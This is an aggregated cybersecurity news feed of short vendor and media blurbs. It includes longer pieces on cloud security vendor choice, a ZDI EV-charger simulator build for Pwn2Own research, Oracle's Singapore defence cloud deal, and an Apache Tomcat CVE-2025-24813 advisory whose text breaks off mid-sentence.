We are closing the cleartext HTTP ports entirely for Cloudflare API traffic. This prevents the risk of clients unintentionally leaking their secret API keys in cleartext during the initial request.

by Cloudflare

Cloudflare Aegis provides dedicated egress IPs for Zero Trust origin access strategies, now supporting BYOIP and customer-facing configurability, with observability of Aegis IP utilization soon.

by Cloudflare

We’re introducing a new Application Security experience in the Cloudflare dashboard, with a reworked UI organized by use cases, making it easier for customers to navigate and secure their accounts.

by Cloudflare

Both Android devices and iPhones are 3.5 times more likely to be infected with malware once "broken" and 250 times more likely to be totally compromised, recent research shows.

by Dark Reading

ThreatDown Endpoint Protection has been awarded AVLab''s Product of the Year for the third consecutive year.

by ThreatDown

Researchers uncovered a March 11 incident that may have led to the larger supply chain attack.  

by Cybersecurity Dive

KnowBe4, Security Awareness Training leader, today launched its Phishing Threat Trend Report, detailing key trends, new data, and threat intelligence insights surrounding phishing threats targeting organisations at the start of 2025. Based on data generated by KnowBe4 Defend, this edition highlights the growing threat of ransomware and explores how cybercriminals are using sophisticated tactics to […] The post New KnowBe4 Report Reveals a Spike in Phishing Campaigns appeared first on IT Security Guru.

by IT Security Guru

Protecting your cloud environment for the long term involves choosing a security partner whose priorities align with your needs. Here''s what you need to know.As organizations embrace multi-cloud and hybrid environments, the complexity of securing that landscape increases. However, the overlooked risks may not come solely from threat actors. Choosing a security provider that has conflicting priorities can also introduce risk. The best cloud security program is built on independence, transparency and aligned priorities around your security needs. Here are five critical considerations for choosing the right security provider to protect your organization — and your cloud strategy — for the long term.1. Checks and balances are essentialYour cloud security provider should be your second set of eyes — not the same entity responsible for your infrastructure. You lose critical checks and balances when your cloud provider is also your security vendor. No company can be entirely impartial when tasked with policing itself. Keeping security independent from infrastructure ensures risks aren’t overlooked because they conflict with a cloud service provider’s product roadmap, revenue model or strategic priorities.2. Visibility is power — be careful who you give it toMany security vendors see everything — your configurations, vulnerabilities and even metadata about how you use various cloud services. That visibility is necessary for protection but can become a competitive lever in the wrong hands. Ask yourself: does this vendor have other lines of business that benefit from knowing how I operate — for example, do they compete in cloud infrastructure, data services or AI/machine learning platforms? Your cloud security provider should be focused solely on protecting you — not gathering intelligence that could inform sales strategies elsewhere on how to upsell you.3. Priorities shift — will yours still matter?Many cloud security platforms promise broad, multi-cloud support, but priorities change. What happens when future product development leans toward one specific cloud environment? Will integrations with your preferred platforms lag? Will support or feature enhancements begin favoring certain clouds over others? Choose a partner whose roadmap aligns with your needs — not one that might shift with changing corporate objectives.4. Plan for portability — don’t get trappedThe cloud is dynamic, and change is difficult and expensive for organizations. Don’t commit to a vendor that locks you into a specific cloud ecosystem or makes it costly to adapt as your business evolves. The best partners enable flexibility. They make it easy to scale, shift or change providers without risking your security posture — or budget.5. Securing the cloud means more than just “cloud security”The time for solutions that are solely focused on cloud security is coming to an end. As security threats continue to evolve, exposure management — which requires understanding business risk across all facets of the organization — should be the goal. Any security product that you adopt must be flexible enough to fit into your broader exposure management strategy. Additionally, most large organizations are operating a hybrid cloud environment, which requires visibility into the entire attack surface. As we all know, threat actors know no boundaries — all your bases must be covered — from cloud to operational technology to clients and more.What the right cloud security provider looks likeWhen evaluating cloud security vendors, prioritize those who are: Truly cloud-agnostic — no ownership or influence from any cloud providerFocused solely on security, not selling you infrastructureResearch and security innovators, with an established track recordEquipped to protect multi-cloud and hybrid environments equally wellTransparent about product roadmaps and prioritiesCommitted to your long-term flexibility and controlCloud security is too important to entrust to anyone whose priorities aren’t fully aligned with yours. Choose independence. Choose neutrality. Choose a partner whose only job is to protect you — wherever your cloud strategy takes you next.

by Tenable

The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a new campaign that targets the defense sectors with Dark Crystal RAT (aka DCRat). The campaign, detected earlier this month, has been found to target both employees of enterprises of the defense-industrial complex and individual representatives of the Defense Forces of Ukraine. The activity involves

by The Hacker News

The SANS Internet Storm Center reported exploitation attempts against two critical vulnerabilities, which were initially disclosed in September.

by Cybersecurity Dive

UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim environments for information theft and credential harvesting.

by Cisco Talos Blog

Barracuda’s Managed XDR team recently contained a determined and complex attack by a ransomware gang. The attackers had been trying to find a way into a manufacturing company’s network since December 2024 and finally succeeded by exploiting an exposed firewall vulnerability.

by Barracuda

by ComputerWeekly

Discover the best IDP solutions for streamlining software development, improving consistency, and enabling self-service access to development tools.

by ITPro Today

Chinese ecommerce giants like Temu and AliExpress sell drone accessories like those used by soldiers in the Russia-Ukraine conflict.

by WIRED Security News

SideWinder, also known as Rattlesnakeor T-APT-04, is an advanced persistent threat group that has been active since at least 2012 and is believed to originate from India. Traditionally targeting government, military, and business entities across Asia, the group has recently broadened its focus. It now intensifies attacks on maritime and logistics sectors in South and Southeast Asia, the Middle East, and Africa while also showing a marked interest in nuclear power plants and energy institutions [2]​. A hallmark of SideWinder is its rapid adaptation to security detections, as it monitors when security solutions identify its tools and modifies its malware, often within hours, to evade detection. 

by Picus Security

Indicator Blockingis a defense evasion technique that adversaries use to prevent security tools from detecting or reporting malicious activity by interfering with indicators of compromise (IOCs). Security solutions such as endpoint detection and response (EDR), antivirus software, and intrusion detection systems (IDS) rely on IOCs such as file hashes, network connections, domain names, and registry changes to identify and flag potential threats. By blocking these indicators from being generated, logged, or transmitted, attackers can evade detection and maintain persistence within a compromised environment.

by Picus Security

We are excited to introduce support for private hostname and IP address-defined applications as well as reusable access policies.

by Cloudflare

Join Snyk’s Field CTO, Steven Schmidt, and Mihai Saveschi, Senior Director of Security Service Management at CIBC, for an exclusive fireside chat on the evolving landscape of application security in financial services.

by Snyk

Global politics and a growing economy draw the wrong kind of attention to India, with denial-of-service and application attacks both on the rise.

by Dark Reading

A message posted on Monday to the homepage of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) is the latest exhibit in the Trump administration''s continued disregard for basic cybersecurity protections. The message instructed recently-fired CISA employees to get in touch so they can be rehired and then immediately placed on leave, asking employees to send their Social Security number or date of birth in a password-protected email attachment -- presumably with the password needed to view the file included in the body of the email.

by Krebs on Security

Wiz’s $32 billion all-cash acquisition by Google parent Alphabet promises a colossal payday for the cybersecurity startup’s early-stage investors. The deal is a big win for Sequoia, one of the best-known VC firms, which stands to make $3 billion, about 25x the money it invested in the company, Bloomberg reported. Despite substantial returns for Sequoia’s […]

by TechCrunch

by CrowdStrike

by CrowdStrike

Elastic Security Labs describes ABYSSWORKER, a malicious driver used with the MEDUSA ransomware attack-chain to disable anti-malware tools.

by Elastic Security Lab

FluxBB 1.5.11 - Stored Cross-Site Scripting (XSS)

by Exploit DB

JUX Real Estate 3.4.0 - SQL Injection

by Exploit DB

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2532.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2531.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2530.

by Zero Day Initiative Advisories

Using stalkerware is creepy, unethical, potentially illegal, and puts your data and that of your loved ones in danger.

by TechCrunch

Another consumer-grade spyware operation was hacked in June 2024, which exposed thousands of Apple Account credentials.

by TechCrunch

Threat actors are exploiting a severe security flaw in PHP to deliver cryptocurrency miners and remote access trojans (RATs) like Quasar RAT. The vulnerability, assigned the CVE identifier CVE-2024-4577, refers to an argument injection vulnerability in PHP affecting Windows-based systems running in CGI mode that could allow remote attackers to run arbitrary code. Cybersecurity company

by The Hacker News

CISA this week added CVE-2025-24472 to its catalog of known exploited vulnerabilities, citing ransomware activity targeting the authentication bypass flaw.

by Dark Reading

Trend Micro uncovered a method that nation-state threat actors are using to target victims via the Windows .Ink shortcut file extension.

by Dark Reading

Don''t find out the hard way that this upgrade isn''t optional.

by ZDNET Security

Learn about the details of our upcoming webinar on DMARC and the benefits of doing it right in this webinar preview post.

by Barracuda

by Dark Reading

by Dark Reading

Several major companies in the finance sector were impacted by the third-party breach, prompting them to notify thousands of customers of their compromised data.

by Dark Reading

The DFRLab reviews Canada’s 2025 Public Inquiry into Foreign Interference The post An existential threat: Disinformation ‘single biggest risk’ to Canadian democracy  appeared first on DFRLab.

by DFRLab

by Dark Reading

The recently leaked trove of internal chat logs among members of the Black Basta ransomware operation has revealed possible connections between the e-crime gang and Russian authorities. The leak, containing over 200,000 messages from September 2023 to September 2024, was published by a Telegram user @ExploitWhispers last month. According to an analysis of the messages by cybersecurity company

by The Hacker News

Visit Mitiga at booth number N-4618 at RSA Conference 2025 to learn about cloud detection and response.

by Mitiga

AttackIQ has released a new assessment template that emulates the various post-compromise Tactics, Techniques, and Procedures (TTPs) associated with the sabotage-motivated Chinese adversary Salt Typhoon. The post Emulating the Sophisticated Chinese Adversary Salt Typhoon appeared first on AttackIQ.

by AttackIQ

Researching and reverse engineering Level 2 Electric Vehicle Supply Equipment (EVSE or loosely “charger”) efforts might require the equipment to be placed beyond the idle state. The idle state is straightforward and usually involves nothing more than powering up the charger. Indeed, this is a very useful state for research where the user interface is in operation, communications both wired and wireless are working and the mobile device app can interact. However, there are times when there is a need to force the charger into other states so that it behaves as though the electric vehicle is attached, the EV is asking for charge, or the EV is charging and the EVSE is providing charging current.  At the Pwn2Own Automotive 2025 event, an add-on category was introduced that required a demonstration of an exploit while the equipment was in the charging state. This required manipulation of the charger via the charging cable in order to enter this charging state. This blog describes the device that we assembled to achieve this requirement. I will cover the design considerations that were made along with how the device operates. I will also provide the specifics on parts that we used; however, due to the wide range of requirements different researchers might have and substitutions they might make, I will only highlight the important points of the design and not describe this as a “step-by-step” build.  As an example of a minimal “simulator” build, some chargers have been observed to provide an output signal when the charging cable attaches to the vehicle. If your research only involves this signal, then a diode and a single resistor inside your EV simulator enclosure may be enough to achieve your goal. So, understand our device first and then use that knowledge to build what you require for your research. SafetyFirst and foremost is safety. If you are familiar with researching EVSE, you know that you will be dealing with deadly voltages. This is the case here as well. Even more dangerous is the fact that the EV simulator will enable the high voltage onto the charging cable and inside the simulator itself. This increases the number of components that have high voltage and thus increases the danger. Every precaution and safety measure should be taken in dealing with high voltage and high current. If you are not knowledgeable and confident with working around deadly high voltages or are not sure of appropriate safety measures, do not attempt to build a simulator or work with EVSE. An alternative might be to educate yourself and ask others with the appropriate qualifications for help.  As we were about to publish this blog, we found some pre-built devices that are limited but might still be an option for some.  These are listed in the “Pre-Built Alternatives” section below.Basic OperationThe EV simulator is based on SAE J1772 operation. There are other standards that define EVSE to EV connections but our focus in this blog is strictly J1772. The basic information needed can be found here. The key items this implies are:J1772-2009 connector is used. Control signaling (over the Control Pilot signal) is strictly PWM/duty cycle.If you study the wiki link above, you will see that the EV communicates to the EVSE on the CP line via a resistor network in the vehicle. The EVSE will sense a resistance to determine if the cable is connected to the EV (2740 ohms) and if the vehicle wants charging (882 ohms). On the flip side, the EVSE provides a 1kHz PWM signal to the vehicle to indicate the maximum current that the EVSE is willing to provide to the EV. This is done through the duty cycle of the signal. The duty cycle to current mapping is defined by J1772.The EV simulator provides the proper resistance values using a rotary switch and monitors the PWM signal with a low-cost onboard oscilloscope. These parts reside on or inside a plastic enclosure to provide safety from high voltage and anchor the main components.In our EV simulator, the rotary switch is set to “0” when we want to simulate a disconnected cable. It is set to “1” to simulate a connection to a vehicle but no charge being requested. Finally, it is set to “2” to simulate a connected vehicle requesting a charge. These are the only three states that we decided to incorporate into our simulator. Figure 1 – The EV Simulator at the time of P20 Automotive Tokyo 2025 PartsThis is a list of components that we used to build our EV simulator and their links to Amazon USA. The resistors come in a kit, and we used 2700ohm for the 2740ohm requirement and 820ohm for the 882ohm requirement. These approximate values appeared to work on the EVSEs that we tested. However, you could find a more particular EVSE that needs values closer to the specification. In that case, you could combine other resistors in the kit to get closer to the specification.As for the diode, you should try to use the one we used or one with even lower Vf specification. This diode worked with all of the chargers we were able to test. We tried higher Vf diodes with limited success. Some chargers were more tolerant of a higher Vf but many were not. The diode is required because most EVSE will test for its existence as a safety measure. ·      Project box: LeMotech Junction Box ·      Receptacle: J1772 receptacle ·      Resistor 2740 ohm and 882 ohm: Chanzon 300 Piece Resistor Kit·      Diodes: Chanzon 1N5817 Schottky Barrier Rectifier Diodes·      Rotary switch: Taiss Universal Changeover Switch·      Volt/Amp Meter: DROK Volt Amo Meter·      Oscilloscope: FNIRSI DSO152 Oscilloscope ·      Load Plug: 20FT NEMA 6-15P/6-15R Power Extension Cord·      Load: Cadet F Series Baseboard HeaterConsiderationsA few of the items are not strictly necessary but do help in verifying the simulator is working as expected. Substitutions are also possible depending on your needs.The bare minimum is the enclosure, the J1772 receptacle, and the proper resistor and diode values. How you manipulate the resistor network, monitor the PWM signal, and if you do or do not implement a load is flexible and up to you.Assembly of (Our) EV SimulatorOur initial step in assembly was to drill or cut holes into the plastic enclosure. Placement isn’t critical; however, we did attempt to make things ergonomic and to not block the indicators with cables or our hands while manipulating the switch. Secondly, we connected the resistors and diode to the rotary switch and mounted that assembly inside the enclosure. This circuit connects to the Control Pilot (CP) and Protective Earth (PE) inside the enclosure. Figure 2 – Schematic of components connected to the rotary switch. Again, this was our implementation. We left S0 on our switch open to simulate a cable in the unconnected state without having to physically plug and unplug the cable. We also chose to control the two resistor states (S1 and S2) separately. The schematic in the wiki shows a different configuration in which only one toggle is required, and the values of the resistors are adjusted.  Both are valid so build based on your constraints. Finally, as seen in the schematic, we did not utilize states 3 -5 on the rotary switch because the additional charging states were not needed for our research at the time.Next, the J1772 receptacle needs to be wired. Figure 3 – The J1772 charge connector as seen from the open end If you choose not to add a load to the simulator, the wiring is fairly easy. You only need to bring out the Control Pilot (CP) signal and the Protective Earth (PE) from the back of the connector. If you want to include a simulated battery load, you will need to also bring out the two high voltage lines (L1 and L2/N) with the appropriate size wire (remember, these can be high current depending on the load you pick). We conservatively used a 12-gauge wire, and our anticipated load was 500W. L1 and L2/N were then routed out of the enclosure to a plug so that the 500W load could be removed or added at will. The plug (in the material list above) was a heavy-duty extension cord that we cut and hardwired to the enclosure on one side and to the load on the other side. We also included a Volt/Amp meter to monitor the J1772 receptacle. When the EVSE engaged charging, the meter would show 230V (in our case) and 2.2A if the load was attached otherwise, 0A. Finally, an inexpensive battery-powered oscilloscope was attached with double-sided tape to the front of the enclosure. The probe cable was routed inside to monitor the PWM signal present on the CP wire. This simple scope defaulted to displaying several measurements, which included a duty cycle, so it was a good fit for this purpose. Other than pressing “Auto Set” once the 1KHz signal was present, there was no other configuration required.Thus, the full enclosure schematic is: Figure 4 – The full schematic of our EV simulator TargetsThis EV simulator was evaluated on all of the targets used at Pwn2Own Automotive 2025. This included Level 2 chargers from Autel, ChargePoint, WOLFBOX, Emporia, Ubiquity, and Tesla (with NACS adaptor). All the EVSE devices were successfully placed into the charging state and 500W was provided to the load using this simulator.Pre-Built Alternatives As mentioned in the “Safety” section, we noticed a few consumer devices, which might be adequate for some research and would avoid having to assemble any parts. These devices appear to be designed primarily to charge electric scooters from an EVSE. To do this, they effectively provide the minimum circuit to enable the EVSE to energize the cable. Note that these do not provide a direct way to measure the CP signal.  Always follow the manufacturer’s safety instructions when using these devices.·      220V J1772 Type1 Socket to NEMA 5-15/5-20 EV Charger Adapter·      J1772 to Nema 5-20, EV Station Charging AdapterFinal Thoughts The J1772 standard is straightforward to implement for the limited purpose of emulating an attached vehicle to these chargers. There are more sophisticated protocols on the horizon (CAN over the CP signal) but most of the consumer-grade EVSEs continue to utilize J1772. Additionally, with such a large established base of J1772, support from the EVSEs and the EVs will likely continue far into the future.  Hopefully, this blog describing our design considerations and how we built our EV simulator will simplify the process for other researchers. While official contest specifics are still months away for the Pwn2Own Automotive event for 2026, there will almost certainly be a contest category for using the charging cable as the attack surface again. This was a highlighted addition to the 2025 event over 2024 and we hope to build on that for 2026.Until then, you can follow us on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

Part 3/4: Darktrace releases insights on the State of AI in cybersecurity. This blog discusses the impact of AI-powered attacks and the capabilities of AI defense on the SOC.

by Darktrace

Research finds that organizations are granting root access by default and making other big missteps, including a Jenga-like building concept, in deploying and configuring AI services in cloud deployments.

by Dark Reading

In today’s digital world, security breaches are all too common. Despite the many security tools and training programs available, identity-based attacks—like phishing, adversary-in-the-middle, and MFA bypass—remain a major challenge. Instead of accepting these risks and pouring resources into fixing problems after they occur, why not prevent attacks from happening in the first place? Our upcoming

by The Hacker News

Learn about a reference design for a new Beacon Object Files portable executable concept and helpful features. The post The Things We Think and Do Not Say: The Future of Our Beacon Object Files (BOFs) appeared first on NetSPI.

by NetSPI

Dataminr, a data analytics company that counts NATO and OpenAI among its customers, has raised $85 million in a combination of convertible financing and credit, the company announced on Wednesday. It’s chump change for Dataminr, which closed a $475 million round at a $4.1 billion valuation in 2021. But the company has seen its fair […]

by TechCrunch

As cyberattacks grow more sophisticated, organizations must adopt a proactive, multi-layered approach to cyber resilience.

by ITPro Today

The threat actors behind the ClearFake campaign are using fake reCAPTCHA or Cloudflare Turnstile verifications as lures to trick users into downloading malware such as Lumma Stealer and Vidar Stealer. ClearFake, first highlighted in July 2023, is the name given to a threat activity cluster that employs fake web browser update baits on compromised WordPress as a malware distribution vector. The

by The Hacker News

Identity-based attacks are on the rise. Attackers are targeting identities with compromised credentials, hijacked authentication methods, and misused privileges. While many threat detection solutions focus on cloud, endpoint, and network threats, they overlook the unique risks posed by SaaS identity ecosystems. This blind spot is wreaking havoc on heavily SaaS-reliant organizations big and small

by The Hacker News

Friction is a force that surrounds everyone all of the time. For developer teams, it can be a source of both inspiration and irritation for IT leaders.

by ITPro Today

A Europol report says nation-state actors are increasingly working with organized crime networks to achieve geopolitical goals, including the destabilization of the EU.

by Dark Reading

PSEA says it ""took steps to ensure"" its stolen data was deleted, suggesting a ransom demand was paid

by TechCrunch

China is investing billions in global internet infrastructure through its Digital Silk Road Initiative, advancing its interests over the US The post Connecting the other half of humanity is the deal of the century appeared first on DFRLab.

by DFRLab

Campaign exploits long-running false and misleading claims purporting US bioweapons-related activity in Europe and elsewhere The post Cross-platform multilingual campaign amplifies biolabs conspiracy targeting US and Armenia   appeared first on DFRLab.

by DFRLab

Is your password on the list? If so - tsk, tsk.

by ZDNET Security

Eskenzi PR are proud to announce that nominations are open for the 12th annual European Cybersecurity Bloggers Awards. The 2025 event is sponsored by Keeper Security and Pulse Conferences and supported once again by media partners, Infosecurity Magazine and the IT Security Guru. The awards will take place at Novotel London ExCeL on the 4th […] The post Nominations Open for 2025 European Cybersecurity Blogger Awards appeared first on IT Security Guru.

by IT Security Guru

Move over Windows.

by ThreatDown

Mobile networks continue to be a major target for cybersecurity breaches, and Chinese hacking group Salt Typhoon’s persistent attacks on multiple carriers are only the latest known examples.  The mobile carrier startup Cape is taking a novel approach to addressing the problem: It has built a service it says can provide a more secure, private […]

by TechCrunch

The question is no longer "Are we compliant?" but "Are we truly resilient?"

by Dark Reading

Business email compromise (BEC) attacks rose 13% last month, with the average requested wire transfer increasing to $39,315, according to a new report from Fortra.

by KnowBe4

With financial stress at an all-time high, people are desperately seeking relief. Sadly, scammers know this all too well.

by Malwarebytes Labs

With Cloudflare for AI, developers, security teams and content creators can leverage Cloudflare’s network and portfolio of tools to secure, observe and make AI applications resilient and safe to use.

by Cloudflare

How do you tell the difference between trustworthy open-source developers and hackers? Here''s one idea.

by ZDNET Security

By building and integrating a new heuristics framework into the Cloudflare Ruleset Engine, we now have a more flexible system to write rules and deploy new releases rapidly.

by Cloudflare

Firewall for AI discovers and protects your public LLM-powered applications, and is seamlessly integrated with Cloudflare WAF. Join the beta now and take control of your generative AI security.

by Cloudflare

How Cloudflare uses generative AI to slow down, confuse, and waste the resources of AI Crawlers and other bots that don’t respect “no crawl” directives.

by Cloudflare

It''s hard to tell the difference between web content produced by humans and web content produced by AI. We''re taking new approach to making AI content distinguishable without impacting performance.

by Cloudflare

Learn more about how Cloudflare developed an AI model to uncover malicious JavaScript intent using a Graph Neural Network, from pre-processing data to inferencing at scale.

by Cloudflare

Picture this: an always-awake, never-tired, high-speed librarian that instantly finds the exact information you need from a massive collection of books. This extraordinary librarian is also capable of processing millions of requests simultaneously, understands partial or misspelled words, and even predicts what you’re looking for before you finish asking.

by SpiderLabs Blog

We’re giving MSPs a 15-day, no-obligation trial to explore the OneView Platform on their own terms.

by ThreatDown

More than 15 women have graduated from cyberUPLIFT, a new cybersecurity training programme from TECwomen, a community-interest company committed to supporting, training, and building a network for women who work or aspire to work in the Technology, Engineering, and Creative Digital industries. The programme, which builds on the success of TECwomen’s digitalUPLIFT initiative, was developed […] The post Over 15 women graduate from new cybersecurity training programme appeared first on IT Security Guru.

by IT Security Guru

To strengthen its distributed and complex operations, this global technology leader implemented Darktrace / EMAIL to monitor, detect, and mitigate potential email threats. Read the blog to discover their results.

by Darktrace

Cybersecurity researchers have disclosed details of two critical flaws impacting mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system used in operational technology (OT) environments, that could allow malicious actors to take control of susceptible systems. ""These vulnerabilities, if exploited, could grant unauthorized access to industrial control networks, potentially

by The Hacker News

The Citizen Lab said it believes several governments may be customers of spyware maker Paragon Solutions.

by TechCrunch

Sperm donor giant California Cryobank has announced it has suffered a data breach that exposed customers'' personal information.

by Malwarebytes Labs

The combined security platform will expand Google’s reach across a range of major cloud environments.

by Cybersecurity Dive

by ComputerWeekly

An IT pro asks for advice on troubleshooting synchronization and password issues when integrating on-premises Active Directory with Azure AD.

by ITPro Today

The tech giant has yet to address a vulnerability that allows for malicious payloads to be delivered via Windows shortcut files and has been under active attack for eight years.

by Cybersecurity Dive

Also known as the ''soap opera effect,'' motion smoothing is ideal for gaming and live sports but less so for everything else. Here''s how to turn off the feature.

by ZDNET Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a vulnerability linked to the supply chain compromise of the GitHub Action, tj-actions/changed-files, to its Known Exploited Vulnerabilities (KEV) catalog. The high-severity flaw, tracked as CVE-2025-30066 (CVSS score: 8.6), involves the breach of the GitHub Action to inject malicious code that enables a remote

by The Hacker News

Sophos X-Ops’ research, presented at Virus Bulletin 2024, uses ‘multimodal’ AI to classify spam, phishing, and unsafe web content

by Sophos News

Singapore will now have access to high-performance, air-gapped, and secure cloud computing, data management, and artificial intelligence (AI) services of Oracle. Singapore''s Ministry of Defence (MINDEF) inked a deal on Tuesday with the U.S. cloud computing giant for the use of its ""Oracle Cloud Isolated Region."" This platform is set to strengthen Singapore''s digital capabilities as part of its modernization efforts. The Defence Science and Technology Agency (DSTA), the technology arm of MINDEF, will leverage OCI to enhance operational efficiency, cybersecurity, and scalability. Enhancing National Defense with Cloud Technology DSTA''s decision to integrate OCI into its digital infrastructure is aimed at supporting MINDEF’s critical functions. “The demand for secure and scalable cloud solutions is growing. It is more than just data storage and computing—it will be the foundation for a lot of innovation,"" said Ng Chad-Son, Chief Executive of DSTA. ""Through this pilot collaboration with Oracle, we will harness advanced cloud and AI technologies to digitalise and transform our operations.” By utilizing OCI, MINDEF gains access to high-performance computing, artificial intelligence (AI), and machine learning (ML) capabilities. This will allow the ministry to improve real-time analytics, streamline decision-making, and fortify cyber resilience against evolving threats. Why Oracle Cloud? Oracle’s cloud solutions provide MINDEF with enhanced security features and data sovereignty—critical factors for government agencies handling sensitive information. The collaboration between Oracle and DSTA will ensure that defense-related workloads remain protected while benefiting from the flexibility and cost-efficiency of cloud computing. Oracle Cloud Infrastructure is designed to support mission-critical operations with built-in security, high availability, and compliance with strict regulatory requirements. Oracle Cloud Isolated Region is a sovereign, air-gapped OCI region offering the same services as public OCI regions. Fully disconnected from the internet, it provides MINDEF and SAF with a secure, scalable, and resilient environment for enhanced insights and faster decision-making. “Oracle has safeguarded the world’s most sensitive data for decades. We are pleased to bring this expertise to support the Singapore defence community’s missions,” said Rand Waldron, Global Defense CTO of Oracle. “Our air-gapped, isolated cloud regions bring the capabilities of our public cloud and defense ecosystem to the world''s most secure networks. Oracle is built to deliver the highest levels of security and performance for governments around the world.” This new partnership will likely deliver next-generation cloud solutions tailored to the specific needs of Singapore’s defense sector, the authorities believe. Scalability and Future Readiness One of the key advantages of adopting OCI is its scalability. As defense operations evolve, MINDEF will require a flexible cloud infrastructure capable of adapting to emerging technologies. Oracle’s cloud solutions offer seamless integration with existing systems, ensuring that future upgrades and expansions can be implemented efficiently. Additionally, OCI’s global presence and localized data centers provide MINDEF with the ability to scale resources dynamically, optimizing performance and cost-effectiveness. This ensures that Singapore’s defense ecosystem remains agile in responding to new challenges and operational demands. Singapore’s decision to adopt Oracle Cloud Infrastructure marks a significant step toward a more advanced and resilient defense system. With OCI’s cutting-edge security, AI-driven analytics, and scalable infrastructure, MINDEF is well-positioned to navigate the complexities of modern warfare and cybersecurity challenges. The latest partnership with Singapore also comes on the heels of another major announcement from last week where Oracle launched an AI Centre of Excellence that will foster innovation across South-East Asia from Singapore. The cloud computing solutions provider has increased its focus on the region in recent times. It announced $6.5 billion investment for AI and cloud computing in Malaysia, last year, one of the biggest for the region. Also Read: Singapore Reveals Updated OT Masterplan 2024 to Strengthen Cybersecurity

by The Cyber Express

Part 2/4: Darktrace releases insights on the State of AI in cybersecurity. This blog discusses AI’s impact on the cyber threat landscape.

by Darktrace

Cybercriminals are spreading a stealer disguised as a "cheat manager" via YouTube videos to steal login credentials. Get the lowdown!

by Kaspersky

The new Arcane stealer spreads via YouTube and Discord, collecting data from many applications, including VPN and gaming clients, network utilities, messaging apps, and browsers.

by Securelist

The first few months of 2025 saw a massive spike in phishing-as-a-service (PhaaS) attacks targeting organizations around the world, with more than a million attacks detected by Barracuda systems in January and February.

by Barracuda

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-30066 to its Known Exploited Vulnerabilities catalog, warning of a supply chain compromise in GitHub Actions. The vulnerability, affecting tj-actions/changed-files, allows attackers to extract sensitive secrets such as AWS keys and GitHub tokens from logs. The compromise was traced to reviewdog/action-setup@v1, a dependency, indicating a […] The post CISA Warns of Active Exploitation in GitHub Action Supply Chain Attack appeared first on ZENDATA Cybersecurity.

by Zendata

🔊 *Hudson Rock* is back with a new podcast episode! In this episode, Leonid Rozenberg, cybercrime and threat intelligence researcher, speaks with Kevin Poireault from Infosecurity Magazine Magazine about the Infostealer landscape in 2025. While Infostealers are still harvesting passwords and cookies, Leonid dives into additional malware features such as: 🔹 File-grabbing module🔹 Credit card […] The post The Information Heist: Cracking the Code on Infostealers (New Hudson Rock Interview) appeared first on InfoStealers.

by InfoStealers

The New Zealand Computer Emergency Response Team (CERT NZ) has issued an urgent security advisory warning of a critical vulnerability, CVE-2025-24813, that affects several versions of Apache Tomcat. This Apache Tomcat vulnerability presents serious security risks, including remote code execution (RCE), information disclosure, and content corruption.   The vulnerability, CVE-2025-24813, is found in Apache Tomcat versions 9.x, 10.x, and 11.x, with certain configurations making systems particularly susceptible to attack. According to the advisory, this flaw could allow an unauthenticated attacker to upload a malicious serialized payload to a vulnerable server. If specific conditions are met, the attacker can exploit this flaw to execute arbitrary code on the server.  This Apache Tomcat vulnerability is linked to the default servlet of Apache Tomcat, which handles HTTP requests. A malicious attacker could exploit improper handling of file uploads by the default servlet to execute harmful code or gain access to sensitive information. The issue is particularly concerning as it could lead to remote code execution (RCE) or allow attackers to manipulate or corrupt sensitive data.  Affected Versions due to Apache Tomcat Vulnerability  The vulnerability affects the following versions of Apache Tomcat:  Apache Tomcat 11.0.0-M1 to 11.0.2  Apache Tomcat 10.1.0-M1 to 10.1.34  Apache Tomcat 9.0.0.M1 to 9.0.98  These versions are vulnerable to CVE-2025-24813 if they meet additional conditions outlined in the vendor advisory. Applications running on these versions are at risk if they allow file uploads with partial PUT support enabled, especially if attackers can manipulate the file paths and exploit insecure configurations.  How Attackers Could Exploit CVE-2025-24813  Exploiting CVE-2025-24813 requires specific conditions. To view sensitive files or inject malicious content into these files, the following conditions must be met:  Writes enabled for the default servlet (disabled by default).  Partial PUT support enabled (enabled by default).  A target URL for sensitive uploads located within a sub-directory of public uploads.  Knowledge of the names of sensitive files being uploaded.  The vulnerable files also being uploaded via partial PUT.  For an attacker to gain remote code execution, additional conditions must be met:  The application is using Tomcat’s file-based session persistence with the default storage location.  The application includes a library that could be used in a deserialization attack.  The New Zealand CERT also noted that a proof-of-concept (PoC) and reports of active exploitation have already surfaced, making this flaw even more pressing for those using vulnerable versions. Why You Should Be Concerned  The severity of CVE-2025-24813 cannot be overstated. Given that it allows for remote code execution and information disclosure, organizations could face severe consequences, including the unauthorized execution of arbitrary code, exposure of sensitive data, or potential corruption of vital application files.  The flaw is particularly dangerous as it is relatively easy for attackers to exploit, especially when all the conditions for partial PUT support and other configurations are met. For organizations that rely on Apache Tomcat to serve Java applications, the risk of exposure is significant, and immediate action is required. How to Protect Your Systems  To mitigate the risks associated with CVE-2025-24813, Apache Tomcat users are advised to upgrade their installations to secure versions. The following versions have fixed the vulnerability:  Apache Tomcat 11.0.3 or later  Apache Tomcat 10.1.35 or later  Apache Tomcat 9.0.99 or later  Upgrading to one of these versions will ensure that systems are no longer vulnerable to this flaw. Additionally, system administrators should follow best practices for securing their Tomcat configurations, including disabling unnecessary features and ensuring that file upload capabilities are appropriately configured.  Conclusion CVE-2025-24813 is actively being exploited, with a proof of concept confirmed by the NCSC. To mitigate risks, organizations should upgrade 